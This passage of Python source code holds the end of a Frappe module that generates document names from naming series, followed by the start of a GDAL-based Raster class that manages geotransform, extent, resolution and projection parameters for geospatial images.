doctype="", doc=""): """ Creates an autoname from the given key: **Autoname rules:** * The key is separated by '.' * '####' represents a series. The string before this part becomes the prefix: Example: ABC.#### creates a series ABC0001, ABC0002 etc * 'MM' represents the current month * 'YY' and 'YYYY' represent the current year *Example:* * DE/./.YY./.MM./.##### will create a series like DE/09/01/0001 where 09 is the year, 01 is the month and 0001 is the series """ if key == "hash": return frappe.generate_hash(doctype, 10) if "#" not in key: key = key + ".#####" elif "." not in key: error_message = _("Invalid naming series (. missing)") if doctype: error_message = _("Invalid naming series (. missing) for {0}").format(doctype) frappe.throw(error_message) parts = key.split('.') n = parse_naming_series(parts, doctype, doc) return n def parse_naming_series(parts, doctype='', doc=''): n = '' if isinstance(parts, string_types): parts = parts.split('.') series_set = False today = now_datetime() for e in parts: part = '' if e.startswith('#'): if not series_set: digits = len(e) part = getseries(n, digits) series_set = True elif e == 'YY': part = today.strftime('%y') elif e == 'MM': part = today.strftime('%m') elif e == 'DD': part = today.strftime("%d") elif e == 'YYYY': part = today.strftime('%Y') elif e == 'timestamp': part = str(today) elif e == 'FY': part = frappe.defaults.get_user_default("fiscal_year") elif e.startswith('{') and doc: e = e.replace('{', '').replace('}', '') part = doc.get(e) elif doc and doc.get(e): part = doc.get(e) else: part = e if isinstance(part, string_types): n += part return n def getseries(key, digits): # series created ? current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (key,)) if current and current[0][0] is not None: current = current[0][0] # yes, update it frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` + 1 WHERE `name`=%s", (key,)) current = cint(current) + 1 else: # no, create it frappe.db.sql("INSERT INTO `tabSeries` (`name`, `current`) VALUES (%s, 1)", (key,)) current = 1 return ('%0'+str(digits)+'d') % current def revert_series_if_last(key, name, doc=None): if ".#" in key: prefix, hashes = key.rsplit(".", 1) if "#" not in hashes: return else: prefix = key if '.' in prefix: prefix = parse_naming_series(prefix.split('.'), doc=doc) count = cint(name.replace(prefix, "")) current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (prefix,)) if current and current[0][0]==count: frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` - 1 WHERE `name`=%s", prefix) def get_default_naming_series(doctype): """get default value for `naming_series` property""" naming_series = frappe.get_meta(doctype).get_field("naming_series").options or "" if naming_series: naming_series = naming_series.split("\n") return naming_series[0] or naming_series[1] else: return None def validate_name(doctype, name, case=None, merge=False): if not name: frappe.throw(_("No Name Specified for {0}").format(doctype)) if name.startswith("New "+doctype): frappe.throw(_("There were some errors setting the name, please contact the administrator"), frappe.NameError) if case == "Title Case": name = name.title() if case == "UPPER CASE": name = name.upper() name = name.strip() if not frappe.get_meta(doctype).get("issingle") and (doctype == name) and (name != "DocType"): frappe.throw(_("Name of {0} cannot be {1}").format(doctype, name), frappe.NameError) special_characters = "<>" if re.findall("[{0}]+".format(special_characters), name): message = ", ".join("'{0}'".format(c) for c in special_characters) frappe.throw(_("Name cannot contain special characters like {0}").format(message), frappe.NameError) return name def append_number_if_name_exists(doctype, value, fieldname="name", separator="-", filters=None): if not filters: filters = dict() filters.update({fieldname: value}) exists = frappe.db.exists(doctype, filters) regex = "^{value}{separator}\d+$".format(value=re.escape(value), separator=separator) if exists: last = frappe.db.sql("""SELECT `{fieldname}` FROM `tab{doctype}` WHERE `{fieldname}` {regex_character} %s ORDER BY length({fieldname}) DESC, `{fieldname}` DESC LIMIT 1""".format( doctype=doctype, fieldname=fieldname, regex_character=frappe.db.REGEX_CHARACTER), regex) if last: count = str(cint(last[0][0].rsplit(separator, 1)[1]) + 1) else: count = "1" value = "{0}{1}{2}".format(value, separator, count) return value def _set_amended_name(doc): am_id = 1 am_prefix = doc.amended_from if frappe.db.get_value(doc.doctype, doc.amended_from, "amended_from"): am_id = cint(doc.amended_from.split("-")[-1]) + 1 am_prefix = "-".join(doc.amended_from.split("-")[:-1]) # except the last hyphen doc.name = am_prefix + "-" + str(am_id) return doc.name def _field_autoname(autoname, doc, skip_slicing=None): """ Generate a name using `DocType` field. This is called when the doctype's `autoname` field starts with 'field:' """ fieldname = autoname if skip_slicing else autoname[6:] name = (cstr(doc.get(fieldname)) or "").strip() return name def _prompt_autoname(autoname, doc): """ Generate a name using Prompt option. This simply means the user will have to set the name manually. This is called when the doctype's `autoname` field starts with 'prompt'. """ # set from __newname in save.py if not doc.name: frappe.throw(_("Name not set via prompt")) def _format_autoname(autoname, doc): """ Generate autoname by replacing all instances of braced params (fields, date params ('DD', 'MM', 'YY'), series) Independent of remaining string or separators. Example pattern: 'format:LOG-{MM}-{fieldname1}-{fieldname2}-{#####}' """ first_colon_index = autoname.find(":") autoname_value = autoname[first_colon_index + 1:] def get_param_value_for_match(match): param = match.group() # trim braces trimmed_param = param[1:-1] return parse_naming_series([trimmed_param], doc=doc) # Replace braced params with their parsed value name = re.sub(r"(\{[\w | #]+\})", get_param_value_for_match, autoname_value) return name
py
1a3f91850b9a2d6a2d2ef266581f6a8366fa6d49
# Version 1.0; Erik Husby; Polar Geospatial Center, University of Minnesota; 2017 from __future__ import division import os import numbers from operator import itemgetter import gdal, ogr, osgeo, osr import numpy as np PROJREF_POLAR_STEREO = """PROJCS["unnamed",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433],AUTHORITY["EPSG","4326"]],PROJECTION["Polar_Stereographic"],PARAMETER["latitude_of_origin",-70],PARAMETER["central_meridian",0],PARAMETER["scale_factor",1],PARAMETER["false_easting",0],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]]]""" RASTER_DEFAULT_PROJREF = PROJREF_POLAR_STEREO gdal.UseExceptions() class RasterIOError(Exception): def __init__(self, msg=""): self.msg = msg def __str__(self): return repr(self.msg) class InvalidArgumentError(Exception): def __init__(self, msg=""): self.msg = msg def __str__(self): return repr(self.msg) class Raster: """ *** NOTE THAT ONLY 'NORTH-UP' GEOTIFF IMAGES ARE FULLY SUPPORTED AT THIS TIME *** Contains methods to extract pixel data, geotransform, projection, corner coordinates, geometry, and other associated information from a raster image, built on the framework provided by GDAL's GDALDataset class. Additionally, 'smart' getter and setter methods are provided for all data members listed in the class initialization (data members are referred to as a raster's 'parameters' hereafter) that make it possible to store and modify the values of useful parameters while maintaining a self-consistent dataset. A Raster instance starts with all parameters set to None, except for those whose names are provided to the initialization call as additional arguments beyond the first. As for the first argument, if it is a path to a valid raster file (or equivalently, if it is an osgeo.gdal.Dataset object), all values of those parameters which are to be set will be extracted directly from the provided raster dataset. If 'ds' is not included in that list (or equivalently, 'all' and 'no-ds' are included), the class will not keep a reference to the raster dataset in its 'ds' parameter after initialization is complete. If the first argument is instead None, those parameters which are to be set will be set to their respective default values (as retrieved from the getter methods mentioned later). After initialization, setting individual parameters should be done via the Raster.set_param() method. Since changing the value of one parameter of a raster image (such as the 'x' array of horizontal grid coordinates) may affect the (x-)size of the image in pixel SHAPE, the RESOLUTION of the image pixels (in the x-direction, dx), and the geographic EXTENT of the image (in its x-coordinates), to maintain a self-consistent dataset any modifications should be propagated to those parameters that are based on the same core values of SHAPE, RESOLUTION, or EXTENT. This is done by default, but may be turned off by passing the 'prop' keyword argument as False. Core values for each property -- SHAPE ('shape'), RESOLUTION ('dx', 'dy', 'res', the dx and dy parts of 'geo_trans'), EXTENT (the xmin and ymax parts of 'geo_trans') -- may be set (remember, every parameter is initialized to None unless specifically set) automatically by passing the 'set_core' keyword argument as True when using Raster.set_param() to set a higher-level (non-core) parameter. Furthermore... When setting a parameter that directly sets a value(s) in only one of the three Raster property domains SHAPE, RESOLUTION, or EXTENT, it must be determined which of the other two properties will be held constant (or as close as possible to constant in the case of changing SHAPE/EXTENT when RESOLUTION is held constant). By default, EXTENT is preserved when setting SHAPE/RESOLUTION and RESOLUTION is preserved when setting EXTENT. This behavior may be changed when setting any applicable parameter by passing the 'hold' keyword argument as the name of the property you wish to preserve ('shape', 'res', or 'extent'). Setting a parameter with Raster.set_param() in 'default mode' (by passing None as the 'value' argument with the 'set_default' keyword argument set to True) will attempt to use the values of other already-set parameters to determine a value for the new parameter. This is done to try to keep the Raster in a self-consistent state. Getter methods for each parameter work to accomplish this task, and may be used by themselves to extract wanted information from the Raster without setting any unneeded parameters. NOTE: These getter methods will give no warning if there are inconsistencies among the parameter values, and should be used at the risk of the programmer. Since no copying is done when setting parameters to values that are mutable objects, multiple references may exist in a program that point to the value of a Raster parameter and one must be careful. However, since it is highly beneficial to be able to make direct modifications to such items (without copying, modifying, and passing the result into Raster.set_param() over and over), calling Raster.prop_param() after making direct modifications to the value of a parameter will essentially propagate those changes to other parameters in the Raster by forcing the getter methods to ignore the modified parameter when looking for values that should be held constant through the propagation. At this time, changes are not propagated through to the pixel data parameter 'z' after z is set. """ def __init__(self, rasterFile_or_ds=None, *set_params): self.ds = None self.shape = None self.z = None self.x = None self.y = None self.dx = None self.dy = None self.res = None self.geo_trans = None self.corner_coords = None self.proj_ref = None self.spat_ref = None self.geom = None set_params_unique = list(set(set_params)) if 'all' in set_params_unique: set_params_unique = ['ds', 'shape', 'z', 'x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords', 'proj_ref', 'spat_ref', 'geom'] if 'no-ds' in set_params: if 'ds' in set_params_unique: set_params_unique.remove('ds') if 'no-ds' in set_params_unique: set_params_unique.remove('no-ds') if rasterFile_or_ds is not None: self.set_param('ds', self.open_ds(rasterFile_or_ds)) if set_params_unique: self.extract_and_set(*set_params_unique) if 'ds' not in set_params_unique: self.ds = None elif set_params_unique: if 'ds' in set_params_unique: raise InvalidArgumentError("`ds` parameter cannot be set when `rasterFile_or_ds`" " argument is None") self.set_params(*set_params_unique) @staticmethod def open_ds(rasterFile_or_ds): ds = None if isinstance(rasterFile_or_ds, str): if not os.path.isfile(rasterFile_or_ds): raise RasterIOError("No such `rasterFile`: '{}'".format(rasterFile_or_ds)) ds = gdal.Open(rasterFile_or_ds, gdal.GA_ReadOnly) elif type(rasterFile_or_ds) == osgeo.gdal.Dataset: ds = rasterFile_or_ds else: raise InvalidArgumentError("Invalid input type for `rasterFile_or_ds`: {}".format( type(rasterFile_or_ds))) return ds def extract_z(self): return self.ds.GetRasterBand(1).ReadAsArray() if self.ds is not None else None def extract_shape(self): return (self.ds.RasterYSize, self.ds.RasterXSize) if self.ds is not None else None def extract_geo_trans(self): return np.array(self.ds.GetGeoTransform()) if self.ds is not None else None def extract_proj_ref(self): return self.ds.GetProjectionRef() if self.ds is not None else None def wkt(self, corner_coords=None): if corner_coords is None: corner_coords = self.get_corner_coords() return 'POLYGON (({}))'.format( ','.join([" ".join([str(c) for c in cc]) for cc in corner_coords]) ) def wkt_to_coords(self, wkt): eval_str = 'np.array({})'.format( wkt.replace('POLYGON ','').replace('(','[').replace(')',']').replace(',','],[').replace(' ',',') ) return eval(eval_str) def extract_param(self, pname): if self.ds is None: raise RasterIOError("Raster must have a raster dataset reference in its 'ds'" " data member before parameters may be extracted") pname = pname.lower() value = None if pname in ('shape', 'x', 'y', 'corner_coords'): shape = self.extract_shape() if pname in ('x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords'): geo_trans = self.extract_geo_trans() if pname in ('proj_ref', 'spat_ref'): proj_ref = self.extract_proj_ref() if pname == 'ds': value = self.ds elif pname == 'shape': value = shape elif pname == 'z': value = self.extract_z() elif pname == 'x': value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1] elif pname == 'y': value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5] elif pname == 'dx': value = abs(geo_trans[1]) elif pname == 'dy': value = abs(geo_trans[5]) elif pname == 'res': value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan elif pname == 'geo_trans': value = geo_trans elif pname == 'corner_coords': value = self.get_corner_coords(geo_trans, shape) elif pname == 'proj_ref': value = proj_ref elif pname == 'spat_ref': value = osr.SpatialReference(proj_ref) if proj_ref is not None else None elif pname == 'geom': value = ogr.Geometry(wkt=self.wkt(self.extract_param('corner_coords'))) elif pname == 'geom_sr': value = self.extract_param('geom') spat_ref = self.extract_param('spat_ref') if spat_ref is not None: value.AssignSpatialReference(spat_ref) else: print("WARNING: Spatial reference could not be extracted from raster dataset," " so extracted geometry has not been assigned a spatial reference.") else: raise InvalidArgumentError("Invalid parameter for extraction: {}".format(pname)) return value def extract_params(self, *params): if self.ds is None: raise RasterIOError("Raster must have a raster dataset reference in its 'ds'" " data member before parameters may be extracted") pset = set(params) valid_pnames = vars(self).keys() valid_pnames.append('geom_sr') invalid_pnames = pset.difference(set(valid_pnames)) if invalid_pnames: raise InvalidArgumentError("Invalid parameter(s) for extraction: {}".format(invalid_pnames)) if pset.intersection({'shape', 'x', 'y', 'corner_coords', 'geom', 'geom_sr'}): shape = self.extract_shape() if pset.intersection({'x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords', 'geom', 'geom_sr'}): geo_trans = self.extract_geo_trans() if pset.intersection({'proj_ref', 'spat_ref', 'geom_sr'}): proj_ref = self.extract_proj_ref() if pset.intersection({'corner_coords', 'geom', 'geom_sr'}): corner_coords = self.get_corner_coords(geo_trans, shape) if pset.intersection({'spat_ref', 'geom_sr'}): spat_ref = osr.SpatialReference(proj_ref) if proj_ref is not None else None if pset.intersection({'geom', 'geom_sr'}): geom = ogr.Geometry(wkt=self.wkt(corner_coords)) value_list = [] for pname in params: pname = pname.lower() value = None if pname == 'ds': value = self.ds elif pname == 'shape': value = shape elif pname == 'z': value = self.extract_z() elif pname == 'x': value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1] elif pname == 'y': value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5] elif pname == 'dx': value = abs(geo_trans[1]) elif pname == 'dy': value = abs(geo_trans[5]) elif pname == 'res': value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan elif pname == 'geo_trans': value = geo_trans elif pname == 'corner_coords': value = corner_coords elif pname == 'proj_ref': value = proj_ref elif pname == 'spat_ref': value = spat_ref elif pname == 'geom': value = geom elif pname == 'geom_sr': value = geom.Clone() if 'geom' in params else geom if spat_ref is not None: value.AssignSpatialReference(spat_ref) else: print("WARNING: Spatial reference could not be extracted from raster dataset," " so extracted geometry has not been assigned a spatial reference.") value_list.append(value) return value_list def set_params(self, *params): set_core = False params_copy = None if 'all' in params: params_copy = ('z', 'x', 'y', 'corner_coords', 'spat_ref', 'geom') set_core = True params_copy = tuple(set(params_copy)) for p in params_copy: self.set_param(p, set_core=set_core) def set_params_and_values(self, *pname_value): pnames = list(pname_value[0::2]) values = pname_value[1::2] if len(pnames) != len(values): raise InvalidArgumentError("Unequal number of parameter names and parameter values") valid_parameters = vars(self).keys() for i in range(len(pnames)): p = pnames[i] if isinstance(p, str): if p in valid_parameters: continue elif p == 'geom_sr': pnames[i] = 'geom' continue raise InvalidArgumentError("Starting with the first argument, every other argument " "must be a valid string name of a Raster parameter") for i in range(len(pnames)): exec('self.{} = values[{}]'.format(pnames[i], i)) def extract_and_set(self, *params): self.set_params_and_values(*[a for b in zip(params, self.extract_params(*params)) for a in b]) def clear_params(self): params = vars(self).keys() params.remove('ds') for p in params: exec('self.{} = None'.format(p)) def get_shape(self, caller_function=None): if self.shape is not None: return self.shape elif self.z is not None: return self.z.shape elif caller_function == 'get_res': return None xsize, ysize = None, None if self.x is not None: xsize = len(self.x) if self.y is not None: ysize = len(self.y) if (xsize is None or ysize is None) and self.corner_coords is not None: if xsize is None: dx = self.get_res('dx', 'get_shape') if not np.isnan(dx): cc_x = self.corner_coords[:, 0] if cc_x[2] is not None and cc_x[0] is not None: xsize = (cc_x[2] - cc_x[0]) / dx if ysize is None: dy = self.get_res('dy', 'get_shape') if not np.isnan(dy): cc_y = self.corner_coords[:, 1] if cc_y[2] is not None and cc_y[0] is not None: ysize = -(cc_y[2] - cc_y[0]) / dy if xsize is None: xsize = 0 if ysize is None: ysize = 0 return ysize, xsize def get_res(self, param='res', caller_function=None): if param not in ('dx', 'dy', 'res'): raise InvalidArgumentError("Invalid `param` argument: {}".format(param)) value = eval('self.{}'.format(param)) if value is not None: return value if param in ('dx', 'dy'): if self.res is not None and not np.isnan(self.res): value = self.res elif param == 'dx': if self.geo_trans is not None: value = self.geo_trans[1] elif self.corner_coords is not None and caller_function != 'get_shape': cc_x = self.corner_coords[:, 0] shape = self.get_shape('get_res') if shape is not None: xsize = shape[1] value = np.nan if xsize == 0 else (cc_x[2] - cc_x[0]) / xsize elif self.x is not None: value = (self.x[1] - self.x[0]) if len(self.x) > 1 else np.nan elif param == 'dy': if self.geo_trans is not None: value = -self.geo_trans[5] elif self.corner_coords is not None and caller_function != 'get_shape': cc_y = self.corner_coords[:, 1] shape = self.get_shape('get_res') if shape is not None: ysize = shape[0] value = np.nan if ysize == 0 else -(cc_y[2] - cc_y[0]) / ysize elif self.y is not None: value = (self.y[0] - self.y[1]) if len(self.y) > 1 else np.nan elif param == 'res': dx = self.get_res('dx') dy = self.get_res('dy') value = dx if dx == dy else np.nan if value is None: value = np.nan return value def get_xmin_ymax(self): xmin, ymax = None, None if self.geo_trans is not None: xmin, ymax = itemgetter(0, 3)(self.geo_trans) elif self.corner_coords is not None: xmin, ymax = self.corner_coords[0] else: if self.geom is not None: corner_coords = self.wkt_to_coords(self.geom.ExportToWkt()) if corner_coords.shape[0] == 5: xmin, ymax = corner_coords[0] if xmin is None or ymax is None: xmin = self.x[0] if (self.x is not None and len(self.x) > 0) else np.nan ymax = self.y[0] if (self.y is not None and len(self.y) > 0) else np.nan return np.array([xmin, ymax]) def get_xmax_ymin(self): xmax, ymin = None, None if self.corner_coords is not None: xmax, ymin = self.corner_coords[2] else: if self.geom is not None: corner_coords = self.wkt_to_coords(self.geom.ExportToWkt()) if corner_coords.shape[0] == 5: xmax, ymin = corner_coords[2] if xmax is None or ymin is None: dx = self.get_res('dx') dy = self.get_res('dy') xmax = (self.x[-1] + dx) if (self.x is not None and len(self.x) > 0) else np.nan ymin = (self.y[-1] - dy) if (self.y is not None and len(self.y) > 0) else np.nan if np.isnan(xmax) or np.isnan(ymin): xmin, ymax = self.get_xmin_ymax() ysize, xsize = self.get_shape() if np.isnan(xmax): xmax = xmin + xsize*dx if np.isnan(ymin): ymin = ymax - ysize*dy return np.array([xmax, ymin]) def get_x(self, xmin=None, xsize=None, dx=None): if self.x is not None \ and (xmin is None and xsize is None and dx is None): return self.x else: if xmin is None: xmin = self.get_xmin_ymax()[0] if xsize is None: xsize = self.get_shape()[1] if dx is None: dx = self.get_res('dx') x = xmin + np.arange(xsize)*dx if xsize > 0: x[0] = xmin return x def get_y(self, ymax=None, ysize=None, dy=None): if self.y is not None \ and (ymax is None and ysize is None and dy is None): return self.y else: if ymax is None: ymax = self.get_xmin_ymax()[1] if ysize is None: ysize = self.get_shape()[0] if dy is None: dy = self.get_res('dy') y = ymax - np.arange(ysize)*dy if ysize > 0: y[0] = ymax return y def get_geo_trans(self): if self.geo_trans is not None: return self.geo_trans else: xmin, ymax = self.get_xmin_ymax() dx = self.get_res('dx') dy = self.get_res('dy') rot1, rot2 = 0, 0 geo_trans = np.array([ xmin, dx, rot1, ymax, rot2, -dy ]).astype(float) return geo_trans def get_corner_coords(self, geo_trans=None, shape=None): if geo_trans is None and self.corner_coords is not None: return self.corner_coords else: if geo_trans is None and self.geom is not None: corner_coords = self.wkt_to_coords(self.geom.ExportToWkt()) if corner_coords.shape[0] == 5: return corner_coords gt = geo_trans if geo_trans is not None else self.geo_trans if gt is not None and (geo_trans is not None or (gt[2] != 0 or gt[4] != 0)): top_left_x = np.full((5, 1), gt[0]) top_left_y = np.full((5, 1), gt[3]) top_left_mat = np.concatenate((top_left_x, top_left_y), axis=1) ysize, xsize = shape if shape is not None else self.get_shape() raster_XY_size_mat = np.array([ [0, 0], [xsize, 0], [xsize, ysize], [0, ysize], [0, 0] ]) gt_mat = np.array([ [gt[1], gt[4]], [gt[2], gt[5]] ]) return top_left_mat + np.dot(raster_XY_size_mat, gt_mat) else: xmin, ymax = self.get_xmin_ymax() xmax, ymin = self.get_xmax_ymin() corner_coords = np.array([ [xmin, ymax], [xmax, ymax], [xmax, ymin], [xmin, ymin], [xmin, ymax] ]) return corner_coords def get_proj_ref(self): if self.proj_ref is not None: return self.proj_ref else: proj_ref = None spat_ref = self.spat_ref if spat_ref is None and self.geom is not None: spat_ref = self.geom.GetSpatialReference() if spat_ref is not None: proj_ref = spat_ref.ExportToWkt() return proj_ref def get_spat_ref(self): if self.spat_ref is not None: return self.spat_ref else: spat_ref = None if self.proj_ref is not None: spat_ref = osr.SpatialReference(self.proj_ref) elif self.geom is not None: spat_ref = self.geom.GetSpatialReference() return spat_ref def get_geom(self): if self.geom is not None: return self.geom else: geom_cc = self.get_corner_coords() if np.any(np.isnan(geom_cc)): geom_cc = np.array([[0, 0]]) geom = ogr.Geometry(wkt=self.wkt(geom_cc)) spat_ref = self.spat_ref if spat_ref is None and self.proj_ref is not None: spat_ref = osr.SpatialReference(self.proj_ref) if spat_ref is not None: geom.AssignSpatialReference(spat_ref) return geom def set_shape(self, shape, hold, set_core=True): if type(shape) not in (tuple, list) or len(shape) != 2 \ or False in [(type(n) in (int, long) and n >= 0) for n in shape]: raise InvalidArgumentError("`shape` must be a numeric tuple or list of length 2") if hold != 'off': new_ysize, new_xsize = shape xmin, ymax = self.get_xmin_ymax() dx = None dy = None if hold == 'res': dx = self.get_res('dx') dy = self.get_res('dy') self.set_extent((xmin, ymax), (xmin + new_xsize*dx, ymax - new_ysize*dy), 'off', False) elif hold == 'extent': xmax, ymin = self.get_xmax_ymin() new_dx = (xmax-xmin)/new_xsize new_dy = (ymax-ymin)/new_ysize self.set_res('dx', new_dx, 'off', False) self.set_res('dy', new_dy, 'off', False) dx, dy = new_dx, new_dy else: raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold)) if self.x is not None and new_xsize != len(self.x): self.set_param('x', self.get_x(xmin, new_xsize, dx), False) if self.y is not None and new_ysize != len(self.y): self.set_param('y', self.get_y(ymax, new_ysize, dy), False) if self.shape is not None or set_core: self.shape = shape def set_res(self, pname, res, hold, set_core=True, skip_gt=False): if pname not in ('dx', 'dy', 'res'): raise InvalidArgumentError("Invalid `pname` argument: {}".format(pname)) if not isinstance(res, numbers.Number) or res < 0 or res == float('inf'): raise InvalidArgumentError("{} must be a positive, finite number".format(pname)) new_dx = res if pname in ('dx', 'res') else self.get_res('dx') new_dy = res if pname in ('dy', 'res') else self.get_res('dy') if hold != 'off': xmin, ymax = self.get_xmin_ymax() ysize, xsize = None, None if hold == 'shape': ysize, xsize = self.get_shape() self.set_extent((xmin, ymax), (xmin + xsize*new_dx, ymax - ysize*new_dy), 'off', False) elif hold == 'extent': xmax, ymin = self.get_xmax_ymin() new_xsize = (xmax-xmin)/new_dx new_ysize = (ymax-ymin)/new_dy new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0 new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0 self.set_shape((new_ysize, new_xsize), 'off', False) self.set_extent((xmin, ymax), (xmin + new_xsize*new_dx, ymax - new_ysize*new_dy), 'off', False) ysize, xsize = new_ysize, new_xsize else: raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold)) if self.x is not None and len(self.x) > 1 and new_dx != (self.x[1]-self.x[0]): self.set_param('x', self.get_x(xmin, xsize, new_dx), False) if self.y is not None and len(self.y) > 1 and new_dy != (self.y[0]-self.y[1]): self.set_param('y', self.get_y(ymax, ysize, new_dy), False) if not skip_gt and (self.geo_trans is not None or set_core): if self.geo_trans is None: self.set_param('geo_trans') new_geo_trans = np.array([ self.geo_trans[0], new_dx, self.geo_trans[2], self.geo_trans[3], self.geo_trans[4], -new_dy ]) self.set_param('geo_trans', new_geo_trans, False) if eval('self.{}'.format(pname)) is not None or set_core: exec('self.{} = res'.format(pname)) if pname == 'res': if self.dx is not None or set_core: self.dx = res if self.dy is not None or set_core: self.dy = res elif self.res is not None or set_core: if self.dx == self.dy and self.dx is not None: self.res = self.dx else: self.res = np.nan def set_extent(self, xmin_ymax, xmax_ymin, hold, set_core=True, skip_gt=False, skip_cc=False, skip_geom=False): if hold in ('off', 'shape', 'res'): pass elif hold is None and xmax_ymin is None: pass else: raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold)) arg_check = [np.array(xmin_ymax)] if xmax_ymin is None: # Translation will be performed. hold = None else: arg_check.append(np.array(xmax_ymin)) if True in [(p.ndim != 1 or len(p) != 2 or not np.issubdtype(p.dtype, np.number)) for p in arg_check]: raise InvalidArgumentError("`xmin_ymax`, `xmax_ymin` must be convertible into a " "numeric numpy.ndarray with ndim=1 and length 2") new_xmin, new_ymax = xmin_ymax new_xmax, new_ymin = None, None if xmax_ymin is not None: new_xmax, new_ymin = xmax_ymin else: ysize, xsize = self.get_shape() new_xmax = new_xmin + xsize*self.get_res('dx') new_ymin = new_ymax - ysize*self.get_res('dy') littleX = True if (self.x is not None and len(self.x) < 2) else False littleY = True if (self.y is not None and len(self.y) < 2) else False if hold != 'off': ysize, xsize = None, None dx = None dy = None if hold == 'shape': ysize, xsize = self.get_shape() new_dx = (new_xmax-new_xmin)/xsize new_dy = (new_ymax-new_ymin)/ysize self.set_res('dx', new_dx, 'off', False) self.set_res('dy', new_dy, 'off', False) dx, dy = new_dx, new_dy elif hold == 'res': dx = self.get_res('dx') dy = self.get_res('dy') new_xsize = (new_xmax-new_xmin)/dx new_ysize = (new_ymax-new_ymin)/dy new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0 new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0 self.set_shape((new_ysize, new_xsize), 'off', False) new_xmax = new_xmin + new_xsize*dx new_ymin = new_ymax - new_ysize*dy ysize, xsize = new_ysize, new_xsize if hold is None: # Perform translation. if xmax_ymin is None: if not littleX and self.x is not None and new_xmin != self.x[0]: self.set_param('x', self.x + (new_xmin - self.x[0]), False) self.x[0] = new_xmin if not littleY and self.y is not None and new_ymax != self.y[0]: self.set_param('y', self.y + (new_ymax - self.y[0]), False) self.y[0] = new_ymax else: if not littleX and self.x is not None \ and (new_xmin != self.x[0] or new_xmax != (self.x[-1] + (self.x[1] - self.x[0]))): self.set_param('x', self.get_x(new_xmin, xsize, dx), False) if not littleY and self.y is not None \ and (new_ymax != self.y[0] or new_ymin != (self.y[-1] - (self.y[0] - self.y[1]))): self.set_param('y', new_ymax - np.arange(ysize)*dy, False) if littleX and len(self.x) == 1: self.set_param('x', self.get_x(new_xmin, 1, 0), False) if littleY and len(self.y) == 1: self.set_param('y', self.get_y(new_ymax, 1, 0), False) if not skip_gt and (self.geo_trans is not None or set_core): if self.geo_trans is None: self.set_param('geo_trans') new_geo_trans = np.array([ new_xmin, self.geo_trans[1], self.geo_trans[2], new_ymax, self.geo_trans[4], self.geo_trans[5] ]) self.set_param('geo_trans', new_geo_trans, False) if not (skip_cc and skip_geom) and (self.corner_coords is not None or self.geom is not None): corner_coords = np.array([ [new_xmin, new_ymax], [new_xmax, new_ymax], [new_xmax, new_ymin], [new_xmin, new_ymin], [new_xmin, new_ymax] ]) if not skip_cc and self.corner_coords is not None: self.set_param('corner_coords', corner_coords, False) if not skip_geom and self.geom is not None: spat_ref = self.geom.GetSpatialReference() geom_cc = corner_coords if not np.any(np.isnan(corner_coords)) else np.array([[0, 0]]) self.set_param('geom', ogr.Geometry(wkt=self.wkt(geom_cc)), False) if spat_ref is not None: self.geom.AssignSpatialReference(spat_ref) def set_projection(self, proj_ref, set_core=True, skip_sr=False, skip_geom=False): try: spat_ref = osr.SpatialReference(proj_ref) spat_ref.IsProjected() except: raise InvalidArgumentError("`proj_ref` must be a WKT projection string that can be " "converted into an osgeo.osr.SpatialReference object") if not skip_sr and self.spat_ref is not None: self.set_param('spat_ref', spat_ref, False) if not skip_geom and self.geom is not None: self.geom.AssignSpatialReference(spat_ref) if self.proj_ref is not None or set_core: self.proj_ref = proj_ref def set_param(self, pname, value=None, prop=True, hold=None, set_core=False, set_default=True): if pname not in vars(self).keys(): raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname)) if value is None: # Set default value for parameter. if not set_default: return elif eval('self.{}'.format(pname)) is not None: # The parameter is already set. Without a value argument, there is nothing to do. print("This Raster's '{}' data member is already set".format(pname)) return elif isinstance(value, str) and value == 'extract': value = self.extract_param(pname) if value is None: prop = False if not prop: hold = 'off' if set_core: prop = True errmsg = None if pname in ('all', 'no-ds'): pass elif pname == 'ds': if value is None: raise InvalidArgumentError("`ds` has no default to be set") ds = value if type(ds) != osgeo.gdal.Dataset: errmsg = "{} must be an osgeo.gdal.Dataset" else: self.ds = ds elif pname == 'shape': shape = value if value is not None else self.get_shape() if hold is None: hold = 'extent' self.set_shape(shape, hold) elif pname == 'z': z = value if value is not None else np.zeros(self.get_shape()) if type(z) != np.ndarray or not np.issubdtype(z.dtype, np.number) or z.ndim != 2: errmsg = "{} must be a numeric numpy.ndarray with ndim=2".format(pname) else: if prop: if hold is None: hold = 'extent' self.set_shape(z.shape, hold, set_core) self.z = z elif pname == 'x': x = value if value is not None else self.get_x() if type(x) != np.ndarray or not np.issubdtype(x.dtype, np.number) or x.ndim != 1 \ or (len(x) > 1 and np.any(~np.isnan(x)) \ and len(np.unique(np.round((x[1:] - x[:-1]), 8))) > 1): errmsg = "{} must be a numeric numpy.ndarray with ndim=1 and regular spacing".format(pname) else: if prop: old_ysize, old_xsize = self.get_shape() old_dx = self.get_res('dx') old_xmin, old_ymax = self.get_xmin_ymax() old_xmax, old_ymin = 